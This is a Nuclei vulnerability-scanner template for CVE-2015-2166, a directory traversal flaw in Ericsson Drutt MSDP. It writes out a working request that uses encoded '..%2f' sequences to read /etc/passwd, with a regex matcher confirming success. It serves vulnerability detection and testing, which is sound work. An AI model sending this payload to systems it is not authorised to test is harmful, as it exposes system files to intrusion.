my-nuclei-templates/CVE-2015-2166.yaml

34 lines
1.0 KiB
YAML

id: CVE-2015-2166
info:
name: Ericsson Drutt MSDP - Local File Inclusion
author: daffainfo
severity: high
description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.
reference:
- https://www.exploit-db.com/exploits/36619
- https://nvd.nist.gov/vuln/detail/CVE-2015-2166
- http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html
- http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/
classification:
cve-id: CVE-2015-2166
tags: cve,cve2015,lfi,ericsson
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08